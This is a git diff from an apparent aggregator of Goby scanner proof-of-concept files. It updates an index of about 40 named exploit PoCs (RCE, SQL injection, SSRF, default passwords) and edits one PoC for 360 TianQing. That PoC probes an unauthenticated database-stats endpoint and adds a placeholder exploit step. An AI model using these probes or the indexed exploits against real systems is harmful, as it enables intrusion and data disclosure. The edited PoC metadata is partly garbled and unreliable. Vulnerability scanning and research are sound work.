diff --git a/README.md b/README.md
index 1c019db..dd6f807 100644
--- a/README.md
+++ b/README.md
@@ -1,48 +1,48 @@
-## goby poc (共935个) 最近一次检查时间 2023-03-19 05:12:23
+## goby poc (共935个) 最近一次检查时间 2023-03-20 05:12:22
### 收集记录
| 文件名称 | 收录时间 |
| :----| :---- |
-| [alibaba_canal_default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [Apache_Kylin_Console_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [Konga_Default_JWT_KEY.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [VMWare_Operations_vRealize_Operations_Manager_API
_SSRF_CVE_2021_21975.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Active_UC_index.action_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [ClickHouse_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Aspcms_Backend_Leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Alibaba_Nacos_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [OpenSNS_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [IceWarp_WebClient_basic_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Consul_Rexec_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_v72_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608
4.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [360_TianQing_ccid_SQL_injectable.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Kylin_Unauthorized_configuration_disclosur
e.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [YAPI_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [H3C_IMC_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [VENGD_Arbitrary_File_Upload.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Cacti_Weathermap_File_Write.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Security_Devices_Hardcoded_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [RuoYi_Druid_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Docker_Registry_API_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [360_Tianqing_database_information_disclosure.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Datang_AC_Default_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Airflow_Unauthorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Weaver_OA_8_SQL_injection.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Solr_File_Read.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
+| [Apache_Solr_File_Read.go](https://github.com/qingchenhh/qc_poc) | 2023-03-20 05:10:55 |
+| [VMWare_Operations_vRealize_Operations_Manager_API
_SSRF_CVE_2021_21975.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Active_UC_index.action_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [ClickHouse_SQLI.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Aspcms_Backend_Leak.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Alibaba_Nacos_Default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [OpenSNS_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [IceWarp_WebClient_basic_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Consul_Rexec_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_v72_SQLI.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608
4.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [360_TianQing_ccid_SQL_injectable.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Kylin_Unauthorized_configuration_disclosur
e.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [YAPI_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [H3C_IMC_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [VENGD_Arbitrary_File_Upload.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Cacti_Weathermap_File_Write.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Security_Devices_Hardcoded_Password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [RuoYi_Druid_Unauthorized_access.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Docker_Registry_API_Unauth.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [360_Tianqing_database_information_disclosure.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Datang_AC_Default_Password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Airflow_Unauthorized.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Weaver_OA_8_SQL_injection.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [alibaba_canal_default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Kylin_Console_Default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Konga_Default_JWT_KEY.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/dzxindex/goby_poc) | 2023-03-20 05:10:49 |
| [yonyou_NC_BeanShell_RCE.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
| [Alibaba_Nacos_Default_password.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
| [Joomla_Rest_API__Unauthorized.go](https://github.com/qingchenhh/qc_poc) | 2023-03-17 05:12:42 |
diff --git a/data.json b/data.json
index 6e0cb30..b6dc07b 100644
--- a/data.json
+++ b/data.json
@@ -4459,11 +4459,6 @@
"from": "https://github.com/qingchenhh/qc_poc",
"up_time": "2023-03-17 05:12:42"
},
- "f2ef89406e066c3ae5f426458a060d28": {
- "name": "Apache_Solr_File_Read.go",
- "from": "https://github.com/qingchenhh/qc_poc",
- "up_time": "2023-03-18 05:10:04"
- },
"0c08c81622022768c2440eac655fbc3d": {
"name": "yonyou_NC_BeanShell_RCE.go",
"from": "https://github.com/qingchenhh/qc_poc",
@@ -4474,204 +4469,209 @@
"from": "https://github.com/qingchenhh/qc_poc",
"up_time": "2023-03-18 05:10:04"
},
- "a95b89986a79c91a7f59d9d75ec942ac": {
- "name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "87adadd634cc919ad6b5e7b4842bb35e": {
- "name": "Active_UC_index.action_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "e646ceb6b2a9ec480bbd4623d4325f32": {
- "name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "434ec564211e33791d5e1961f1b3ebb8": {
+ "f01ced36d8b3caefb829354bd6fd7fc1": {
"name": "SonarQube_unauth_CVE_2020_27986.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/dzxindex/goby_poc",
+ "up_time": "2023-03-20 05:10:49"
},
- "c22a7eded164de18b9b08b1073c24a48": {
+ "698f8ae7a4aff0669896491d060b9d0f": {
+ "name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "c07ba5da657d52f1ee2bf6104750c3f4": {
+ "name": "Active_UC_index.action_RCE.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "9e734128624dc8dd76a46831a7e9721a": {
+ "name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "513fef84b397b9714253b3b368179e20": {
"name": "DedeCMS_Carbuyaction_FileInclude.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "9ab5251e9bd107631260838907f894be": {
+ "4d77792cc7287d63774faee7f1395bef": {
"name": "ClickHouse_SQLI.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "79733cc4aef1d73f095647ddd6902224": {
+ "85c8494e7b893bc0b65badffbc549556": {
"name": "Aspcms_Backend_Leak.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b5a392b27a98471d7a85fceb83f8c2bb": {
+ "bdd884a8409510102c311e67bf8fbf35": {
"name": "Alibaba_Nacos_Default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "30e31bbcb3e3a1c3e726c8712dc9a413": {
+ "1386b44e85f2afe55acb33cdc6dd26e5": {
"name": "Jitong_EWEBS_phpinfo_leak.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "c11dc72c6b76260ea064ec6d065c2c4e": {
+ "ddaeaa89570178bc8ac021dee5c446a2": {
"name": "OpenSNS_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "9d9add12c6a10caa7b95737ddc272dad": {
+ "937d584fb24d1ab86aea5cfbe2300af8": {
"name": "Alibaba_Nacos_Add_user_not_authorized.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "5e17ce4d593835c34fc2ed48eb6ff481": {
+ "41237e0d7696201d59664dd219abd3cb": {
"name": "IceWarp_WebClient_basic_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b3c4ed50cda74c9f027bd85463dc5986": {
+ "fed516d8fa1974abb4ac2f1fd3d80800": {
"name": "Consul_Rexec_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cd7c79c4a8f5954dfc9b94e5572cf7a8": {
+ "96d085787d489b574554b16d4faa9882": {
"name": "Discuz_v72_SQLI.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "536988b739b6d41934e36855a7f359ee": {
+ "5862dcc3f7516a20a57490e6fa4d7690": {
"name": "Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "8f0b5dc58420ec1e6bf9d5eebb198546": {
+ "c667250e8ec2a946aaaee7879a88a541": {
"name": "360_TianQing_ccid_SQL_injectable.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "49963f2392dff43d6ba9478a39ef9b54": {
+ "1114c43aff54e07c9c7bc5511f86a154": {
"name": "GitLab_SSRF_CVE_2021_22214.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "4e566c87e02a8d2eae142e7f2c57e962": {
+ "566c622e106572be52c49ea3fc279874": {
"name": "Discuz_Wechat_Plugins_Unauth.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "f05c778d0dec965304b0652b2ecadc46": {
+ "68ba57a4bd670c0c42c35d21e4f5dc26": {
"name": "IRDM4000_Smart_station_Unauthorized_access.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "bdd6387e6ebfdc1d155e0d80a4afe068": {
+ "d6bad5f70686858fd05c9e312dfabdb6": {
"name": "Apache_Kylin_Unauthorized_configuration_disclosure.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "87a7cd5e962fbfbaf8d239ba4471ba25": {
+ "f4b060111ff19956236844be0e0d0eef": {
"name": "YAPI_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b69a1315894702869a7e904234655abf": {
+ "cd97b511ed98de73cc7b9c89e9f48218": {
"name": "H3C_IMC_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "e4a9fa38a80c8efb2728562e7f347ba5": {
+ "d50c1b89c61b3b68b5d1181a6841af52": {
"name": "Fastmeeting_Arbitrary_File_Read.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cac943f12f9ed2f205014ff87fbbc35b": {
+ "55ad80db239956a843223438a850ac04": {
"name": "VENGD_Arbitrary_File_Upload.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "63e384aaef52dc2beac087d21740d2ea": {
+ "5fcf6c18ba2d72c0c7ae722c9e76a517": {
"name": "FineReport_v9_Arbitrary_File_Overwrite.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "3e8c98edb79eb77daa6b45d8d70f03a3": {
+ "919d80e8c84e30fd9638679cdee90caa": {
"name": "fahuo100_sql_injection_CNVD_2021_30193.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "4181aeaee11b9ea93856a49a8e0159be": {
+ "8b236a6f58657465085590d4b5c1e244": {
"name": "Cacti_Weathermap_File_Write.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "33322c6293c00e0177f01ac3889dd0e9": {
+ "fcbf0d616b0057f605aec56bedf7f368": {
"name": "Security_Devices_Hardcoded_Password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "2f341afe61cba3b5b2104d60e41083b2": {
+ "01f0fb1ab3f35ddf53969011a3553c07": {
"name": "RuoYi_Druid_Unauthorized_access.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "12dc028570c676ed6304d2b56f219c1e": {
+ "9f64f2d8bf3a124e1ebf2d4395870ca0": {
"name": "Docker_Registry_API_Unauth.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b1ae8cb2f529f5eee60bf5c30d1e2df0": {
+ "1afa191a8421b3c5bc7c4da97b6235bc": {
"name": "360_Tianqing_database_information_disclosure.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "465626f5ffd33c92d2b540083c0fc479": {
+ "db406159976a18c09450d5e134706387": {
"name": "Samsung_WLAN_AP_WEA453e_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "534f7819797de150b1c0411dd4a2c869": {
+ "52266baa33db1cf175f371903e5a1aa9": {
"name": "Datang_AC_Default_Password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "5b6f0bfa4927b535a749e3d7f76faca4": {
+ "3b1db00d2d2247346b3f1d417569b8ce": {
"name": "VMware_vCenter_v7.0.2_Arbitrary_File_Read.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cae0710ea595f0910a36af1981e6e296": {
+ "0adbc3de8b02a58343f6a3fc5eabda45": {
"name": "Discuz_RCE_WOOYUN_2010_080723.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "ec3a00491923a14f6cb1d9d44c09c6ac": {
+ "00e57ee9b2dd0e50d2d41464d79b05f1": {
"name": "Apache_Airflow_Unauthorized.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "0b8fcbde235a2adad1aff3dc1080467e": {
+ "4c4cbf98683b8bfadc80ee4231dbb779": {
"name": "Weaver_OA_8_SQL_injection.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "50b9e8e21d6f76d37b80f189ed8664d1": {
+ "5a1f57f97b1337ac13f038768b9c46e5": {
"name": "alibaba_canal_default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "eccacf2cea1bb6a40088b1f9e43fe595": {
+ "c53bd0683e3ae4a6181040f5952445dd": {
"name": "Apache_Kylin_Console_Default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "63e7fcd14c98d13658565ac3aa5126f0": {
+ "8211bdcd16f68a1fb2549e5df9e4f3c7": {
"name": "Konga_Default_JWT_KEY.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "885772a015a908b1d7b8d3ad4aaf4379": {
+ "name": "Apache_Solr_File_Read.go",
+ "from": "https://github.com/qingchenhh/qc_poc",
+ "up_time": "2023-03-20 05:10:55"
}
}
\ No newline at end of file
diff --git a/poc/360_TianQing_ccid_SQL_injectable.json b/poc/360_TianQing_ccid_SQL_injectable.json
index d1e079b..779eaec 100644
--- a/poc/360_TianQing_ccid_SQL_injectable.json
+++ b/poc/360_TianQing_ccid_SQL_injectable.json
@@ -1,17 +1,23 @@
{
"Name": "360 TianQing ccid SQL injectable",
"Level": "2",
- "Tags": [],
- "GobyQuery": "app=\"360-TianQing\"",
- "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
- "Product": "360 TianQing",
- "Homepage": "htp://360.cn",
- "Author": "PeiQi",
- "Impact": "
The attacker can get the server permission by injecting SQL into the upload Trojan
undefined
",
- "References": [
- "http://wiki.peiqi.tech"
- ],
+ "Description": "",
+ "Product": "360 TianQing",
+ "Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
+ "Author": "",
+ "Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
+ "Recommendation": "update",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
 "ScanSteps": [
 "AND",
 {
@@ -21,7 +25,7 @@
 "method": "GET",
 "uri": "/api/dbstat/gettablessize",
 "follow_redirect": false,
- "header": {},
+ "header": null,
 "data_type": "text",
 "data": ""
 },
@@ -62,6 +66,43 @@
 "SetVariable": []
 }
 ],
- "PostTime": "2021-04-08 16:04:28",
- "GobyVersion": "1.8.255"
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "0000-00-00 00:00:00",
